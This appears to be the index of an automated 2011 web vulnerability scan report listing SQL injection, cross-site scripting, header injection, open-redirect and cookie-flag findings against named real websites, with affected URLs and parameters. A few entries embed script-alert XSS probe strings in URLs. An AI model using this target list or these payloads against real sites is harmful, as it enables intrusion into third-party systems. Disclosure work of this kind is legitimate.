CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 01 09:37:54 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

1. SQL injection

1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]

1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]

1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]

1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]

1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]

1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]

1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]

1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]

1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.20. http://www.nutter.com/careers.php [CareerID parameter]

1.21. http://www.nutter.com/careers.php [CategoryID parameter]

1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]

1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]

1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]

1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]

1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]

1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]

1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

2. LDAP injection

3. Cross-site scripting (stored)

3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]

5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]

5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]

5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]

5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]

5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]

5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]

5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]

5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]

5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]

5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]

5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.31. http://api.bing.com/qsonhs.aspx [q parameter]

5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]

5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]

5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]

5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]

5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]

5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]

5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.48. http://my-happyfeet.com/cart.asp [rp parameter]

5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]

5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]

5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]

5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]

5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]

5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]

5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

5.90. http://www.manitu.de/shop/ [account_id parameter]

5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]

5.92. http://www.manitu.de/shop/ [billc_city parameter]

5.93. http://www.manitu.de/shop/ [billc_email parameter]

5.94. http://www.manitu.de/shop/ [billc_fax parameter]

5.95. http://www.manitu.de/shop/ [billc_firstname parameter]

5.96. http://www.manitu.de/shop/ [billc_lastname parameter]

5.97. http://www.manitu.de/shop/ [billc_organization parameter]

5.98. http://www.manitu.de/shop/ [billc_phone parameter]

5.99. http://www.manitu.de/shop/ [billc_street1 parameter]

5.100. http://www.manitu.de/shop/ [billc_street2 parameter]

5.101. http://www.manitu.de/shop/ [billc_title parameter]

5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]

5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]

5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]

5.106. http://www.nutter.com/careers.php [CareerID parameter]

5.107. http://www.nutter.com/careers.php [CategoryID parameter]

5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]

5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]

5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]

5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]

5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]

5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]

5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]

5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]

5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]

5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]

5.121. https://www.territoryahead.com/jump.jsp [path parameter]

5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]

5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]

5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]

5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]

5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]

5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]

5.134. http://www.aol.com/ [dlact cookie]

5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]

5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]

5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]

5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]

5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]

5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]

5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]

5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]

5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]

5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]

5.145. https://www.territoryahead.com/jump.jsp [customer cookie]

5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]

5.147. https://www.territoryahead.com/jump.jsp [order cookie]

5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]

5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml

6.3. http://api.search.live.net/crossdomain.xml

6.4. http://at.atwola.com/crossdomain.xml

6.5. http://b.scorecardresearch.com/crossdomain.xml

6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml

6.7. http://imagec17.247realmedia.com/crossdomain.xml

6.8. http://learn.shavlik.com/crossdomain.xml

6.9. http://log30.doubleverify.com/crossdomain.xml

6.10. http://o.sa.aol.com/crossdomain.xml

6.11. http://oasc05139.247realmedia.com/crossdomain.xml

6.12. http://pixel.quantserve.com/crossdomain.xml

6.13. http://s0.2mdn.net/crossdomain.xml

6.14. http://secure-us.imrworldwide.com/crossdomain.xml

6.15. http://segment-pixel.invitemedia.com/crossdomain.xml

6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml

6.17. http://www.econda-monitor.de/crossdomain.xml

6.18. http://www.huffingtonpost.com/crossdomain.xml

6.19. http://ads.tw.adsonar.com/crossdomain.xml

6.20. http://api.tweetmeme.com/crossdomain.xml

6.21. http://googleads.g.doubleclick.net/crossdomain.xml

6.22. http://js.adsonar.com/crossdomain.xml

6.23. http://music.aol.com/crossdomain.xml

6.24. http://my.screenname.aol.com/crossdomain.xml

6.25. http://o.aolcdn.com/crossdomain.xml

6.26. http://pagead2.googlesyndication.com/crossdomain.xml

6.27. http://static.ak.fbcdn.net/crossdomain.xml

6.28. http://www.aol.com/crossdomain.xml

6.29. http://www.blogsmithmedia.com/crossdomain.xml

6.30. http://www.citysbest.com/crossdomain.xml

6.31. https://www.godaddy.com/crossdomain.xml

6.32. http://www.paperg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://api.search.live.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://dominionenterprises.112.2o7.net/clientaccesspolicy.xml

7.5. http://o.aolcdn.com/clientaccesspolicy.xml

7.6. http://o.sa.aol.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.9. http://www.aol.com/clientaccesspolicy.xml

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://forums.smartertools.com/login.aspx

8.2. http://www.fast-report.com/en/buy/

8.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

8.4. http://www.fast-report.com/en/download/fastreport.net-download.html

8.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

8.6. http://www.fast-report.com/en/products/

8.7. http://www.fast-report.com/en/products/FastReport.Net.html

9. XML injection

9.1. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 1]

9.2. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 2]

10. SQL statement in request parameter

10.1. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

10.2. http://www.bluestarfibres.com/page.php

10.3. http://www.insideup.com/ppc/leadflow/hins00/project.php

10.4. http://www.nutter.com/careers.php

10.5. https://www.supermedia.com/spportal/spportalFlow.do

10.6. https://www.territoryahead.com/jump.jsp

11. SSL cookie without secure flag set

11.1. https://www.territoryahead.com/jump.jsp

11.2. https://feedback.discoverbing.com/default.aspx

11.3. https://www.godaddy.com/

11.4. https://www.godaddy.com/Hosting/web-hosting.aspx

11.5. https://www.godaddy.com/catalog.aspx

11.6. https://www.godaddy.com/domains/search.aspx

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/hosting/website-builder.aspx

11.9. https://www.supermedia.com/spportal/spportalFlow.do

12. Session token in URL

12.1. http://a1.bing4.com/fd/fb/simls

12.2. http://order.1and1.com/xml/order

12.3. http://order.1and1.com/xml/order/CloudDynamicServer

12.4. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

12.5. http://order.1and1.com/xml/order/Contact

12.6. http://order.1and1.com/xml/order/DomaininfoMove

12.7. http://order.1and1.com/xml/order/Eshops

12.8. http://order.1and1.com/xml/order/Home

12.9. http://order.1and1.com/xml/order/Home

12.10. http://order.1and1.com/xml/order/Hosting

12.11. http://order.1and1.com/xml/order/Instant

12.12. http://order.1and1.com/xml/order/Jumpto

12.13. http://order.1and1.com/xml/order/LocalSubmission

12.14. http://order.1and1.com/xml/order/Mail

12.15. http://order.1and1.com/xml/order/MailInstantMail

12.16. http://order.1and1.com/xml/order/MailXchange

12.17. http://order.1and1.com/xml/order/MicrosoftExchange

12.18. http://order.1and1.com/xml/order/MsHosting

12.19. http://order.1and1.com/xml/order/Server

12.20. http://order.1and1.com/xml/order/ServerPremium

12.21. http://order.1and1.com/xml/order/Sharepoint

12.22. http://order.1and1.com/xml/order/VirtualServer

12.23. http://order.1and1.com/xml/order/sitedesign

12.24. http://pub2.camera.trafficland.com/image/live.jpg

12.25. http://sales.liveperson.net/hc/18987408/

12.26. https://secure.shareit.com/shareit/checkout.html

12.27. https://secure.shareit.com/shareit/checkout.html

12.28. http://www.facebook.com/extern/login_status.php

13. Open redirection

13.1. http://b.scorecardresearch.com/r [d.c parameter]

13.2. http://www.global-bd.net/ [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://api.twitter.com/1/statuses/user_timeline.json

14.2. http://c.microsoft.com/trans_pixel.aspx

14.3. https://www.plimus.com/jsp/buynow.jsp

14.4. http://a1.bing4.com/fd/fb/simls

14.5. http://api.flickr.com/clientaccesspolicy.xml

14.6. http://b.aol.com/vanity/

14.7. http://b.scorecardresearch.com/b

14.8. http://b.scorecardresearch.com/p

14.9. http://b.scorecardresearch.com/r

14.10. http://c.bing.com/c.gif

14.11. http://c.microsoft.com/trans_pixel.asp

14.12. http://explore.live.com/Handlers/Plt.mvc

14.13. http://id.google.com/verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif

14.14. http://leadback.advertising.com/adcedge/lb

14.15. http://pixel.mathtag.com/creative/img

14.16. http://pixel.quantserve.com/pixel

14.17. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

14.18. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif

14.19. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js

14.20. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.21. http://safebrowsing.clients.google.com/safebrowsing/gethash

14.22. http://tacoda.at.atwola.com/rtx/r.js

14.23. http://tags.bluekai.com/site/3200

14.24. http://tracker.marinsm.com/tp

14.25. https://www.godaddy.com/

14.26. https://www.godaddy.com/Hosting/web-hosting.aspx

14.27. https://www.godaddy.com/catalog.aspx

14.28. https://www.godaddy.com/domains/search.aspx

14.29. https://www.godaddy.com/gdshop/hosting/landing.asp

14.30. https://www.godaddy.com/hosting/website-builder.aspx

14.31. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15. Cookie without HttpOnly flag set

15.1. http://c.microsoft.com/trans_pixel.aspx

15.2. http://hbc.com/

15.3. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.4. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.7. http://www.aol.com/ajax.jsp

15.8. http://www.bizfind.us/ricerca.asp

15.9. http://www.cramerdev.com/

15.10. http://www.hbccards.com/

15.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

15.12. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15.13. http://www.paperg.com/jsfb/embed.php

15.14. https://www.plimus.com/jsp/buynow.jsp

15.15. https://www.supermedia.com/spportal/spportalFlow.do

15.16. https://www.territoryahead.com/jump.jsp

15.17. http://www.vcahospitals.com/favicon.ico

15.18. https://www2.hbc.com/contactus/contact-us.asp

15.19. http://a1.bing4.com/fd/fb/simls

15.20. http://ad.yieldmanager.com/pixel

15.21. http://ad.yieldmanager.com/unpixel

15.22. http://advertising.microsoft.com/search-advertising

15.23. http://api.flickr.com/clientaccesspolicy.xml

15.24. http://b.aol.com/vanity/

15.25. http://b.scorecardresearch.com/b

15.26. http://b.scorecardresearch.com/p

15.27. http://b.scorecardresearch.com/r

15.28. http://bing.com//us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

15.29. http://bing.com/maps

15.30. http://blog.smartertools.com/Themes/Blogs/leanandgreen/style/DynamicStyle.aspx

15.31. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

15.32. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

15.33. http://blog.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx

15.34. http://blogs.msdn.com/Themes/MSDN2/Images/MSDN/bg_body_MSDN.png

15.35. http://blogs.msdn.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.36. http://blogs.msdn.com/b/sharepoint_workspace_development_team/

15.37. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/contentpane.png

15.38. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/layout-background.png

15.39. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/logo_msdn.png

15.40. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/search2.png

15.41. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-info.gif

15.42. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-rss.gif

15.43. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif

15.44. http://blogs.msdn.com/themes/MSDN2/Images/icon-sprite.gif

15.45. http://blogs.msdn.com/themes/MSDN2/Images/pager-item.png

15.46. http://blogs.msdn.com/themes/MSDN2/css/DynamicStyle.aspx

15.47. http://blogs.msdn.com/themes/MSDN2/css/base.css

15.48. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-core.css

15.49. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-forums.css

15.50. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-groups.css

15.51. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-mediagalleries.css

15.52. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-messages.css

15.53. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-weblogs.css

15.54. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-wikis.css

15.55. http://blogs.msdn.com/themes/MSDN2/css/content-fragments.css

15.56. http://blogs.msdn.com/themes/MSDN2/css/footer-fragments.css

15.57. http://blogs.msdn.com/themes/MSDN2/css/header-fragments.css

15.58. http://blogs.msdn.com/themes/MSDN2/css/print.css

15.59. http://blogs.msdn.com/themes/MSDN2/css/screen.css

15.60. http://blogs.msdn.com/themes/MSDN2/favicon.ico

15.61. http://blogs.msdn.com/themes/blogs/MSDN2/css/DynamicStyle.aspx

15.62. http://blogs.msdn.com/themes/blogs/MSDN2/css/MSDNblogs.css

15.63. http://blogs.msdn.com/themes/generic/css/layout.css

15.64. http://blogs.msdn.com/themes/generic/css/layout.css

15.65. http://blogs.msdn.com/themes/msdn2/css/msdn.css

15.66. http://blogs.msdn.com/themes/msdn2/images/MSDN/widget-right.png

15.67. http://blogs.msdn.com/themes/msdn2/images/msdn/widget-left.png

15.68. http://blogs.msdn.com/utility/jquery/jquery-1.3.2.min.js

15.69. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

15.70. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif

15.71. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif

15.72. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/digg.gif

15.73. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif

15.74. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif

15.75. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/fark.gif

15.76. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/faves.gif

15.77. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif

15.78. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/google.gif

15.79. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/less.gif

15.80. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif

15.81. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif

15.82. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif

15.83. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/more.gif

15.84. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif

15.85. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif

15.86. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif

15.87. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif

15.88. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif

15.89. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif

15.90. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif

15.91. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js

15.92. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/sharethis.css

15.93. http://blogs.technet.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.94. http://blogs.technet.com/analyticsid.aspx

15.95. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

